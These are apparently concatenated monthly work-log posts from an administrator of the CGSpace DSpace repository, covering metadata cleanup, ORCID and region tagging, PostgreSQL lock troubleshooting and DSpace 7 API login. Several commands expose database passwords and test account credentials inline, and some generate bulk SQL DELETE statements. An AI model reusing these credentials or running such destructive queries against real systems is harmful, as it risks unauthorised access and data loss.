- This fixed regions for about fifty items
- I dumped the UN M.49 regions from the CSV on the UNSD website:
```console
$ csvcut -d";" -c 'Region Name,Sub-region Name,Intermediate Region Name' ~/Downloads/UNSD\ \ Methodology.csv | sed -e 1d -e 's/,/\n/g' | sort -u
Africa
Americas
Asia
Australia and New Zealand
Caribbean
Central America
Central Asia
Channel Islands
Eastern Africa
Eastern Asia
Eastern Europe
Europe
Latin America and the Caribbean
Melanesia
Micronesia
Middle Africa
Northern Africa
Northern America
Northern Europe
Oceania
Polynesia
South America
South-eastern Asia
Southern Africa
Southern Asia
Southern Europe
Sub-Saharan Africa
Western Africa
Western Asia
Western Europe
```
- For now I will combine it with our existing list, which contains a few legacy regions, while we discuss about a long-term plan with Peter and Abenet
- Peter wrote to ask me to change the PIM CRP's full name from `Policies, Institutions and Markets` to `Policies, Institutions, and Markets`
- It's apparently the only CRP with an Oxford comma...?
- I updated them all on CGSpace
- Also, I ran an `index-discovery` without the `-b` since now my metadata update scripts update the `last_modified` timestamp as well and it finished in fifteen minutes, and I see the changes in the Discovery search and facets
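- That is, roughly the same invocation as the full rebuild in October, just without `-b`:
```console
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery
```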
## 2022-11-29
- Meeting with Marie-Angelique, Abenet, Sara, Valentina, and Margarita about `dcterms.type` for CG Core
- We discussed some of the feedback from Peter
- Peter and Abenet and I agreed to update some of our metadata in response to the PRMS feedback
- I updated Pacific to Oceania, and Central Africa to Middle Africa, and removed the old ones from the submission form
- These are UN M.49 regions
## 2022-11-30
- I ran csv-metadata-quality on an export of the ILRI community on CGSpace, but only with title, country, and region fields
- It fixed some whitespace issues and added missing regions to about 1,200 items
- I thought of a way to delete duplicate metadata values, since the CSV upload method can't detect them correctly
- First, I wrote a [SQL query](https://chartio.com/learn/databases/how-to-find-duplicate-values-in-a-sql-table/) to identify metadata values with the same `text_value`, `metadata_field_id`, and `dspace_object_id`:
```console
\COPY (SELECT a.text_value, a.metadata_value_id, a.metadata_field_id, a.dspace_object_id
FROM metadatavalue a
JOIN (
SELECT dspace_object_id, text_value, metadata_field_id, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id NOT IN (11, 12, 28, 136, 159) GROUP BY dspace_object_id, text_value, metadata_field_id HAVING COUNT(*) > 1
) b
ON a.dspace_object_id = b.dspace_object_id
AND a.text_value = b.text_value
AND a.metadata_field_id = b.metadata_field_id
ORDER BY a.text_value) TO /tmp/duplicates.txt
```
- (This query excludes metadata for accession and available dates, provenance, format, etc)
- Then, I sorted the file by fields four and one (`dspace_object_id` and `text_value`) so that the duplicate metadata for each item were next to each other, used awk to print the second field (`metadata_value_id`) from every _other_ line, and created a SQL script to delete the metadata:
```console
$ sort -k4,1 /tmp/duplicates.txt | \
awk -F'\t' 'NR%2==0 {print $2}' | \
sed 's/^\(.*\)$/DELETE FROM metadatavalue WHERE metadata_value_id=\1;/' > /tmp/delete-duplicates.sql
```
- This worked very well, but there were some metadata values that were tripled or quadrupled, so it only deleted the first duplicate
- I just ran it again two more times to find the last duplicates, now we have none!
- I also generated another SQL file with commands to update the last modified timestamps of these items:
```console
$ awk -F'\t' '{print $4}' /tmp/duplicates.txt | sort -u | sed "s/^\(.*\)$/UPDATE item SET last_modified=NOW() WHERE uuid='\1';/" > /tmp/update-timestamp.sql
```
- Tezira said she was having trouble archiving submissions
- In the afternoon I looked and found a high number of locks:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c | sort -n
60 dspaceCli
176 dspaceApi
1194 dspaceWeb
```
![PostgreSQL database locks](/cgspace-notes/2022/11/postgres_locks_cgspace-day.png)
- The timing looks suspiciously close to when I was running the batch updates on the ILRI community this morning.
- I restarted Tomcat and PostgreSQL and everything was back to normal
- I found some items on CGSpace in Dinka, Ndogo, and Bari languages, but the `dcterms.language` field was "other"
- That's so unfortunate! These languages are not in ISO 639-1, but they are in ISO 639-3, which uses Alpha 3 and has more space for languages
- I changed them from other to use the three-letter codes, and I will suggest to the CG Core group that we use ISO 639-3 in the future
- Send feedback to Salem about some metadata issues with MEL submissions to CGSpace
<!-- vim: set sw=2 ts=2: -->

content/posts/2022-12.md
---
title: "December, 2022"
date: 2022-12-01T08:52:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-12-01
- Fix some incorrect regions on CGSpace
- I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions
- Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!
- Replace "East Asia" with "Eastern Asia" region on CGSpace (UN M.49 region)
<!--more-->
- CGSpace and PRMS information session with Enrico and a bunch of researchers
- I noticed some minor issues with SPDX licenses and AGROVOC terms in items submitted by TIP so I sent a message to Daniel from Alliance
- I started a harvest on AReS since we've updated so much metadata recently
## 2022-12-02
- File some issues related to metadata on the MEL issue tracker
- [Only use "Open Access" or "Limited Access" access rights when publishing items on CGSpace](https://github.com/CodeObia/MEL/issues/11066)
- [Set the description when submitting bitstreams to CGSpace](https://github.com/CodeObia/MEL/issues/11067)
- [Some items have a Creative Commons license, but are Limited Access and bitstreams are locked](https://github.com/CodeObia/MEL/issues/11068)
## 2022-12-03
- I downloaded a fresh copy of CLARISA's institutions list as well as ROR's latest dump from 2022-12-01 to check how many are matching:
```console
$ curl -s https://api.clarisa.cgiar.org/api/institutions | json_pp > ~/Downloads/2022-12-03-CLARISA-institutions.json
$ jq -r '.[] | .name' ~/Downloads/2022-12-03-CLARISA-institutions.json > ~/Downloads/2022-12-03-CLARISA-institutions.txt
$ ./ilri/ror-lookup.py -i ~/Downloads/2022-12-03-CLARISA-institutions.txt -o /tmp/clarisa-ror-matches.csv -r v1.15-2022-12-01-ror-data.json
$ csvgrep -c matched -m true /tmp/clarisa-ror-matches.csv | wc -l
1864
$ wc -l ~/Downloads/2022-12-03-CLARISA-institutions.txt
7060 /home/aorth/Downloads/2022-12-03-CLARISA-institutions.txt
```
- Out of the box they match 26.4%, but there are many institutions with multiple languages in the text value, as well as countries in parentheses so I think it could be higher
- If I replace the slashes and remove the countries at the end there are slightly more matches, around 29%:
```console
$ sed -e 's_ / _\n_' -e 's_/_\n_' -e 's/ \?(.*)$//' ~/Downloads/2022-12-03-CLARISA-institutions.txt > ~/Downloads/2022-12-03-CLARISA-institutions-alan.txt
```
- I checked CGSpace's top 1,000 affiliations too, first exporting from PostgreSQL:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2022-11-22-affiliations.csv;
```
- Then cutting (tab is the default delimiter):
```console
$ cut -f 1 /tmp/2022-11-22-affiliations.csv > 2022-11-22-affiliations.txt
$ ./ilri/ror-lookup.py -i 2022-11-22-affiliations.txt -o /tmp/cgspace-matches.csv -r v1.15-2022-12-01-ror-data.json
$ csvgrep -c matched -m true /tmp/cgspace-matches.csv | wc -l
542
```
- So that's a 54% match for our top affiliations
- I realized we should actually check affiliations and sponsors, since those are stored in separate fields
- When I add those the matches go down a bit to 45%
- Oh man, I realized institutions like `Université d'Abomey Calavi` don't match in ROR because they are like this in the JSON:
```console
"name": "Universit\u00e9 d'Abomey-Calavi"
```
- So we likely match a bunch more than 50%...
- I exported a list of affiliations and donors from CGSpace for Peter to look over and send corrections
## 2022-12-05
- First day of PRMS technical workshop in Rome
- Last night I submitted a CSV import with changes to 1,500 Alliance items (adding regions) and it hadn't completed after twenty-four hours so I canceled it
- Not sure if there is some rollback that will happen or what state the database will be in, so I will wait a few hours to see what happens before trying to modify those items again
- I started it again a few hours later with a subset of the items and 4GB of RAM instead of 2
- It completed successfully...
## 2022-12-07
- I found a bug in my csv-metadata-quality script regarding the regions
- I was accidentally checking `cg.coverage.subregion` due to a sloppy regex
- This means I've added a few thousand UN M.49 regions to the `cg.coverage.subregion` field in the last few days
- I had to extract them from CGSpace and delete them using `delete-metadata-values.py`
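- The deletion step was roughly like this, assuming `delete-metadata-values.py` takes the same flags as `fix-metadata-values.py` (the CSV name and field ID here are just illustrative):
```console
# -m is the metadata_field_id for cg.coverage.subregion (illustrative value here)
$ ./ilri/delete-metadata-values.py -i /tmp/2022-12-07-delete-subregions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.subregion -m 231
```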
- My [DSpace 7.x pull request to tell ImageMagick about the PDF CropBox](https://github.com/DSpace/DSpace/pull/8550) was merged
- Start a harvest on AReS
## 2022-12-08
- While on the plane I decided to fix some ORCID identifiers, as I had seen some poorly formatted ones
- I couldn't remember the XPath syntax so this was kinda ghetto:
```console
$ xmllint --xpath '//node/isComposedBy/node()' dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE 'label=".*"' | sed -e 's/label="//' -e 's/"$//' > /tmp/orcid-names.txt
$ ./ilri/update-orcids.py -i /tmp/orcid-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```
- After that there were still some poorly formatted ones that my script didn't fix, so perhaps these are new ones not in our list
- I dumped them and combined with the existing ones to resolve later:
```console
localhost/dspace= ☘ \COPY (SELECT dspace_object_id,text_value FROM metadatavalue WHERE metadata_field_id=247 AND text_value LIKE '%http%') to /tmp/orcid-formatting.txt;
COPY 36
```
- I think there are really just some new ones...
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/orcid-formatting.txt| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2022-12-08-orcids.txt
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l
1907
$ wc -l /tmp/2022-12-08-orcids.txt
1939 /tmp/2022-12-08-orcids.txt
```
- Then I applied these updates on CGSpace
- Maria mentioned that she was getting a lot more items in her daily subscription emails
- I had a hunch it was related to me updating the `last_modified` timestamp after updating a bunch of countries, regions, etc in items
- Then today I noticed this option in `dspace.cfg`: `eperson.subscription.onlynew`
- By default DSpace sends notifications for modified items too! I've disabled it now...
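- That is, in `dspace.cfg`:
```console
# only send subscription emails for newly added items, not for modified ones
eperson.subscription.onlynew = true
```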
- I applied 498 fixes and two deletions to affiliations sent by Peter
- I applied 206 fixes and eighty-one deletions to donors sent by Peter
- I tried to figure out how to authenticate to the DSpace 7 REST API
- First [you need a CSRF token](https://github.com/DSpace/RestContract/blob/main/csrf-tokens.md), before you can even try to authenticate
- Then you can authenticate, but I can't get it to work:
```console
$ curl -v https://dspace7test.ilri.org/server/api
...
dspace-xsrf-token: 0b7861fb-9c8a-4eea-be70-b3be3bd0a0b4
...
$ curl -v -X POST --data "user=aorth@omg.com&password=myPassword" "https://dspace7test.ilri.org/server/authn/login" -H "X-XSRF-TOKEN: 0b7861fb-9c8a-4eea-be70-b3be3bd0a0b4"
```
- Start a harvest on AReS
## 2022-12-09
- I found a way to check the owner of a Handle prefix
- You query the admin Handle for the prefix, i.e. https://hdl.handle.net/0.na/10568
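- For example, via the Handle.net JSON API (a sketch):
```console
$ curl -s 'https://hdl.handle.net/api/handles/0.NA/10568' | json_pp
```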
## 2022-12-11
- I got LDAP authentication working on DSpace 7
## 2022-12-12
- Submit some issues to MEL GitHub:
- [Links to https://mel.cgiar.org/dspace/limited for Limited Access items on CGSpace](https://github.com/CodeObia/MEL/issues/11081)
- [Items submitted to CGSpace without Initiative](https://github.com/CodeObia/MEL/issues/11083)
- PRMS planning meeting before tomorrow's meeting with researchers and submitters
## 2022-12-13
- I made some minor changes to csv-metadata-quality
- I switched to using the SPDX license data as a JSON directly from SPDX, instead of via the now-deprecated spdx-license-list package on pypi
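- The canonical license list is available as JSON directly from SPDX, for example:
```console
$ curl -s https://spdx.org/licenses/licenses.json | jq -r '.licenses[].licenseId' | sort | head
```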
- I exported the Initiatives collection to tag missing regions
- I submitted an issue to MEL GitHub:
- [Set the description of bitstreams in the THUMBNAIL bundle to "IM Thumbnail" when submitting to CGSpace](https://github.com/CodeObia/MEL/issues/11084)
- Submit a pull request to [fix the Handle link in the Citizen Lab test URLs for Iran](https://github.com/citizenlab/test-lists/pull/1199)
- I had originally submitted this in 2018, but it seems someone updated the URL in 2020... hmmm
- I normalized the `text_lang` values on CGSpace again:
```console
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 3050302
en | 618
| 605
fr | 2
vi | 2
es | 1
| 0
(7 rows)
dspace=# BEGIN;
BEGIN
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '', NULL);
UPDATE 1223
dspace=# COMMIT;
COMMIT
```
- I wrote an initial version of a script to map CGSpace items to Initiative collections based on their `cg.contributor.initiative` metadata
- I am still considering if I want to add a mode to *un-map* items that are mapped to collections, but do not have the corresponding metadata tag
## 2022-12-14
- Lots of work on PRMS related metadata issues with CGSpace
- We noticed that PRMS uses `cg.identifier.dataurl` for the FAIR score, but not `cg.identifier.url`
- We don't use these consistently for datasets in CGSpace so I decided to move them to the dataurl field, but we will also ask the PRMS team to consider the normal URL field, as there are commonly other external resources related to the knowledge product there
- I updated the `move-metadata-values.py` script to use the latest best practices from my other scripts and some of the helper functions from `util.py`
- Then I exported a list of text values pointing to Dataverse instances from `cg.identifier.url`:
```console
localhost/dspace= ☘ \COPY (SELECT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=219 AND (text_value LIKE '%persistentId%' OR text_value LIKE '%20.500.11766.1/%')) to /tmp/data.txt;
COPY 61
```
- Then I moved them to `cg.identifier.dataurl` on CGSpace:
```console
$ ./ilri/move-metadata-values.py -i /tmp/data.txt -db dspace -u dspace -p 'dom@in34sniper' -f cg.identifier.url -t cg.identifier.dataurl
```
- I still need to add a note to the CGSpace submission form to inform submitters about the correct field for dataset URLs
- I finalized work on my new `fix-initiative-mappings.py` script
- It has two modes:
1. Check item metadata to see which Initiatives are tagged and then map the item if it is not yet mapped to the corresponding Initiative collection
2. Check item collections to see which Initiatives are mapped and then unmap the item if the corresponding Initiative metadata is missing
- The second one is disabled by default until I can get more feedback from Abenet, Michael, and others
- After I applied a handful of collection mappings I started a harvest on AReS
## 2022-12-15
- I did some metadata quality checks on the Initiatives collection, adding some missing regions and removing a few duplicate ones
## 2022-12-18
- Load on the server is a bit high
- Looking at the nginx logs I see someone from the University of Chicago (128.135.98.29) is using RStudio Desktop to query and scrape CGSpace
```
# grep -c 'RStudio Desktop' /var/log/nginx/access.log
5570
```
- RStudio is already in the ILRI bot overrides for DSpace so it shouldn't be causing any extra hits, but I'll put an HTTP 403 in the nginx config to tell the user to use the REST API
- Start a harvest on AReS
## 2022-12-21
- I saw that load on CGSpace was over 20.0 for several hours
- I saw there were some stuck locks in PostgreSQL:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
948 dspaceApi
30 dspaceCli
1237 dspaceWeb
```
- Ah, it's likely there is something stuck because I see the load high since yesterday at 6AM, which is 24 hours now:
![CPU load day](/cgspace-notes/2022/12/cpu-day.png)
![PostgreSQL locks week](/cgspace-notes/2022/12/postgres_locks_ALL-week.png)
- I ran all updates and restarted the server
## 2022-12-22
- I exported the Initiatives collection to check the mappings
- My `fix-initiative-mappings.py` script found six items that could be mapped to new collections based on metadata
- I am still not doing automatic _unmappings_ though...
## 2022-12-23
- I exported the Initiatives collection to check the metadata quality
- I fixed a few errors and missing regions using csv-metadata-quality
- Abenet and Bizu noticed some strange characters in affiliations submitted by MEL
- They appear like so in four items currently `Instituto Nacional de Investigaci<63>n y Tecnolog<6F>a Agraria y Alimentaria, Spain`
- I submitted [an issue](https://github.com/CodeObia/MEL/issues/11108) on MEL's GitHub repository
## 2022-12-24
- Export the ILRI community to try to see if there were any items with Initiative metadata that are not mapped to Initiative collections
- I found about twenty...
- Then I did the same for the AICCRA community
## 2022-12-25
- The load on the server is high and I see some seemingly stuck PostgreSQL locks from dspaceCli:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
44 dspaceApi
58 dspaceCli
```
- [Looking into this more](https://jaketrent.com/post/find-kill-locks-postgres/) I see the PIDs for the dspaceCli locks:
```sql
SELECT pl.pid FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE psa.application_name = 'dspaceCli'
```
- And the SQL queries themselves:
```console
postgres=# SELECT pid, state, usename, query, query_start
FROM pg_stat_activity
WHERE pid IN (
SELECT pl.pid FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE psa.application_name = 'dspaceCli'
);
```
- For these fifty-eight locks there are only six queries running
- Interestingly, they all started at either 04:00 or 05:00 this morning...
- I canceled one using `SELECT pg_cancel_backend(1098749);` and then two of the other PIDs died, perhaps they were dependent?
- Then I canceled the next one and the remaining ones died also
- I exported the entire CGSpace and then ran the `fix-initiative-mappings.py` script, which found 124 items to be mapped
- Getting only the items that have new mappings from the output file is currently tricky because you have to change the file to unix encoding, capture the diff output from the original, and re-add the column headers, but at least this makes the DSpace batch import have to check WAY fewer items
- For the record, I used grep to get only the new lines:
```console
$ grep -xvFf /tmp/orig.csv /tmp/cgspace-mappings.csv > /tmp/2022-12-25-fix-mappings.csv
```
- Then I imported to CGSpace, and will start an AReS harvest once its done
- The import process was quick but it triggered a lot of Solr updates and I see locks rising from dspaceCli again
- After five hours the Solr updating from the metadata import wasn't finished, so I cancelled it, and I see that the items were *not* mapped...
- I split the CSV into multiple files, each with ten items, and the first one imported, but the second went on to do Solr updating stuff forever...
- All twelve files worked except the second one, so it must be something with one of those items...
- Now I started a harvest on AReS
## 2022-12-28
- I got a notice from UptimeRobot that CGSpace was down
- I look at the server and the load is only 3 or 4.x and looking at Munin I don't see any system statistics that are alarming
- PostgreSQL locks look fine, memory and DSpace sessions look fine...
- There were a strangely high number of tuple accesses half an hour ago, and high CPU going up to then
![PostgreSQL tuple access](/cgspace-notes/2022/12/postgres_tuples_cgspace-day.png)
![CPU day](/cgspace-notes/2022/12/cpu-day2.png)
- And I can access the website just fine, so I guess everything is OK
- I exported the Initiatives collection to tag missing regions...
## 2022-12-29
- I exported the Initiatives collection again and I'm wondering why we have so many items with `text_lang` set to NULL and other values when I have been periodically resetting them
- It turns out that doing `... text_lang IN ('en', '', NULL)` doesn't properly check for values with NULL
- We actually need to do:
```sql
UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND (text_lang IS NULL OR text_lang IN ('en', ''));
```
- I updated the text lang values on CGSpace and re-exported the community
- I fixed a bunch of invalid licenses in these items
- Then I added mappings for another handful of items
- I tagged ORCID identifiers for another thirty items or so
- At 8PM I got a notice from UptimeRobot again that CGSpace was down
- The load is still only around 2.x or 3.x, but there are a lot (and increasing) number of PostgreSQL connections and locks
- They appear to be all from the frontend:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
2892 dspaceWeb
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
2950 dspaceWeb
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
3792 dspaceWeb
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
4460 dspaceWeb
```
- I don't see any other system statistics that look out of order...
- DSpace sessions, network throughput, CPU, etc all seem sane...
- And then all of a sudden, I didn't do anything, but all the locks disappeared and I was able to access the website... WTF
## 2022-12-30
- Start a harvest on AReS
## 2022-12-31
- I found a bunch of items on AReS that have issue dates in 2023 which made me curious
- Looking closer, I think all of these have been tagged incorrectly because they were published online already in 2022
- I sent a mail to Abenet and Bizu to ask, but I know for sure that PRMS will consider the earliest publication date as the first published date, no matter whether that was online or in print
- I also added some ORCID identifiers to our list and generated thumbnails for some journal articles that were Creative Commons
<!-- vim: set sw=2 ts=2: -->

content/posts/2023-01.md
---
title: "January, 2023"
date: 2023-01-01T08:44:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-01-01
- Apply some more ORCID identifiers to items on CGSpace using my `2022-09-22-add-orcids.csv` file
- I want to update all ORCID names and refresh them in the database
- I see we have some new ones that aren't in our list if I combine with this file:
<!--more-->
```console
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l
1939
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l
1973
```
- I will extract and process them with my `resolve-orcids.py` script:
```console
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-01-01-orcids.txt
$ ./ilri/resolve-orcids.py -i /tmp/2023-01-01-orcids.txt -o /tmp/2023-01-01-orcids-names.txt -d
```
- Then update them in the database:
```console
$ ./ilri/update-orcids.py -i /tmp/2023-01-01-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```
- Load on CGSpace is high around 9.x
- I see there is a CIAT bot harvesting via the REST API with IP 45.5.186.2
- Other than that I don't see any particular system stats as alarming
- There has been a marked increase in load in the last few weeks, perhaps due to Initiative activity...
- Perhaps there are some stuck PostgreSQL locks from CLI tools?
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
58 dspaceCli
46 dspaceWeb
```
- The current time on the server is 08:52 and I see the dspaceCli locks were started at 04:00 and 05:00... so I need to check which cron jobs those belong to as I think I noticed this last month too
- I'm going to wait and see if they finish, but by tomorrow I will kill them
## 2023-01-02
- The load on the server is now very low and there are no more locks from dspaceCli
- So there *was* some long-running process that was running and had to finish!
- That finally sheds some light on the "high load on Sunday" problem where I couldn't find any other distinct pattern in the nginx or Tomcat requests
## 2023-01-03
- The load from the server on Sundays, which I have noticed for a long time, seems to be coming from the DSpace checker cron job
- This checks the checksums of all bitstreams to see if they match the ones in the database
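- The cron entry in question looks roughly like this (the path and checker flags here are a sketch):
```console
0 4 * * 0,3 /home/dspace/bin/dspace checker -l -p
```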
- I exported the entire CGSpace metadata to do country/region checks with `csv-metadata-quality`
- I extracted only the items with countries, which was about 48,000, then split the file into parts of 10,000 items, but the upload found 2,000 changes in the first one and took several hours to complete...
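- For the splitting, the main thing is to keep the CSV header in each chunk, which xsv can do, for example (a sketch):
```console
$ xsv split -s 10000 /tmp/country-parts /tmp/2023-01-03-countries.csv
```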
- IWMI sent me ORCID identifiers for new scientists, bringing our total to 2,010
## 2023-01-04
- I finally finished applying the region imports (in five batches of 10,000)
- It was about 7,500 missing regions in total...
- Now I will move on to doing the Initiative mappings
- I modified my `fix-initiative-mappings.py` script to only write out the items that have updated mappings
- This makes it way easier to apply fixes to the entire CGSpace because we don't try to import 100,000 items with no changes in mappings
- More dspaceCli locks from 04:00 this morning (current time on server is 07:33) and today is a Wednesday
- The checker cron job runs on `0,3`, which is Sunday and Wednesday, so this is from that...
- Finally at 16:30 I decided to kill the PIDs associated with those locks...
- I am going to disable that cron job for now and watch the server load for a few weeks
- Start a harvest on AReS
## 2023-01-08
- It's Sunday and I see some PostgreSQL locks belonging to dspaceCli that started at 05:00
- That's strange because I disabled the `dspace checker` one last week, so I'm not sure which this is...
- It's currently 2:30PM on the server so these locks have been there for almost twelve hours
- I exported the entire CGSpace to update the Initiative mappings
- Items were mapped to ~58 new Initiative collections
- Then I ran the ORCID import to catch any new ones that might not have been tagged
- Then I started a harvest on AReS
## 2023-01-09
- Fix some invalid Initiative names on CGSpace and then check for missing mappings
- Check for missing regions in the Initiatives collection
- Export a list of author affiliations from the Initiatives community for Peter to check
- It was slightly ghetto because I did it from a CSV export of the Initiatives community, then imported it to OpenRefine to split the multi-value fields, then did some sed nonsense to handle the quoting:
```console
$ csvcut -c 'cg.contributor.affiliation[en_US]' ~/Downloads/2023-01-09-initiatives.csv | \
sed -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' | \
sort -u | \
sed -e 's/^\(.*\)/"\1/' -e 's/\(.*\)$/\1"/' > /tmp/2023-01-09-initiatives-affiliations.csv
```
## 2023-01-10
- Export the CGSpace Initiatives collection to check for missing regions and collection mappings
## 2023-01-11
- I'm trying the DSpace 7 REST API again
- While following the [DSpace 7 REST API authentication docs](https://github.com/DSpace/RestContract/blob/main/authentication.md) I still cannot log in via curl on the command line because I get an `Access is denied. Invalid CSRF token.` message
- Logging in via the HAL Browser works...
- Someone on the DSpace Slack mentioned that the [authentication documentation is out of date](https://github.com/DSpace/RestContract/issues/209) and we need to specify the cookie too
- I tried it and finally got it to work:
```console
$ curl --head https://dspace7test.ilri.org/server/api
...
set-cookie: DSPACE-XSRF-COOKIE=42c78c56-613d-464f-89ea-79142fc5b519; Path=/server; Secure; HttpOnly; SameSite=None
dspace-xsrf-token: 42c78c56-613d-464f-89ea-79142fc5b519
$ curl -v -X POST https://dspace7test.ilri.org/server/api/authn/login --data "user=alantest%40cgiar.org&password=dspace" -H "X-XSRF-TOKEN: 42c78c56-613d-464f-89ea-79142fc5b519" -b "DSPACE-XSRF-COOKIE=42c78c56-613d-464f-89ea-79142fc5b519"
...
authorization: Bearer eyJh...9-0
$ curl -v "https://dspace7test.ilri.org/api/core/items" -H "Authorization: Bearer eyJh...9-0"
```
- I created [a pull request](https://github.com/DSpace/RestContract/pull/213) to fix the docs
- I did quite a lot of cleanup and updates on the IFPRI batch items for the Gender Equality batch upload
- Then I uploaded them to CGSpace
- I added about twenty more ORCID identifiers to my list and tagged them on CGSpace
## 2023-01-12
- I exported the entire CGSpace and did some cleanups on all metadata in OpenRefine
- I was primarily interested in normalizing the DOIs, but I also normalized a bunch of publishing places
- After this import finishes I will export it again to do the Initiative and region mappings
- I ran the `fix-initiative-mappings.py` script and got forty-nine new mappings...
- I added several dozen new ORCID identifiers to my list and tagged ~500 on CGSpace
- Start a harvest on AReS
## 2023-01-13
- Do a bit more cleanup on licenses, issue dates, and publishers
- Then I started importing my large list of 5,000 items changed from yesterday
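- These CSV changes get applied with DSpace's batch metadata editing tool, roughly like this (hypothetical file name):

```console
$ dspace metadata-import -f /tmp/2023-01-13-changes.csv
```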
- Help Karen add abstracts to a bunch of SAPLING items that were missing them on CGSpace
- For now I only did open access journal articles, but I should do the reports and others too
## 2023-01-14
- Export CGSpace and check for missing Initiative mappings
- There were a total of twenty-five
- Then I exported the Initiatives community to check the countries and regions
## 2023-01-15
- Start a harvest on AReS
## 2023-01-16
- Batch import four IFPRI items for CGIAR Initiative on Low-Emission Food Systems
- Batch import another twenty-eight items for IFPRI across several Initiatives
- On this one I did quite a bit of extra work to check for CRPs and data/code URLs in the acknowledgements, licenses, volume/issue/extent, etc
- I fixed some authors, an ISBN, and added extra AGROVOC keywords from the abstracts
- Then I checked for duplicates and ran it through csv-metadata-quality to make sure the countries/regions matched and there were no duplicate metadata values
## 2023-01-17
- Batch import another twenty-three items for IFPRI across several Initiatives
- I checked the IFPRI eBrary for extra CRPs and data/code URLs in the acknowledgements, licenses, volume/issue/extent, etc
- I fixed some authors, an ISBN, and added extra AGROVOC keywords from the abstracts
- Then I found and removed one duplicate in these items, as well as another on CGSpace already (!): 10568/126669
- Then I ran it through csv-metadata-quality to make sure the countries/regions matched and there were no duplicate metadata values
- I exported the Initiatives collection to check the mappings, regions, and other metadata with csv-metadata-quality
- I also added a bunch of ORCID identifiers to my list and tagged 837 new metadata values on CGSpace
- There is a high load on CGSpace pretty regularly
- Looking at Munin, I see a marked increase in DSpace sessions over the last few weeks:
![DSpace sessions year](/cgspace-notes/2023/01/jmx_dspace_sessions-year.png)
- Is this attributable to all the PRMS harvesting?
- I also see some PostgreSQL locks starting earlier today:
![PostgreSQL locks day](/cgspace-notes/2023/01/postgres_connections_ALL-day.png)
- I'm curious to see what kinds of IPs have been connecting, so I will look at the last few weeks:
```console
# zcat --force /var/log/nginx/{rest,access,library-access,oai}.log /var/log/nginx/{rest,access,library-access,oai}.log.1 /var/log/nginx/{rest,access,library-access,oai}.log.{2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25}.gz | awk '{print $1}' | sort | uniq > /tmp/2023-01-17-cgspace-ips.txt
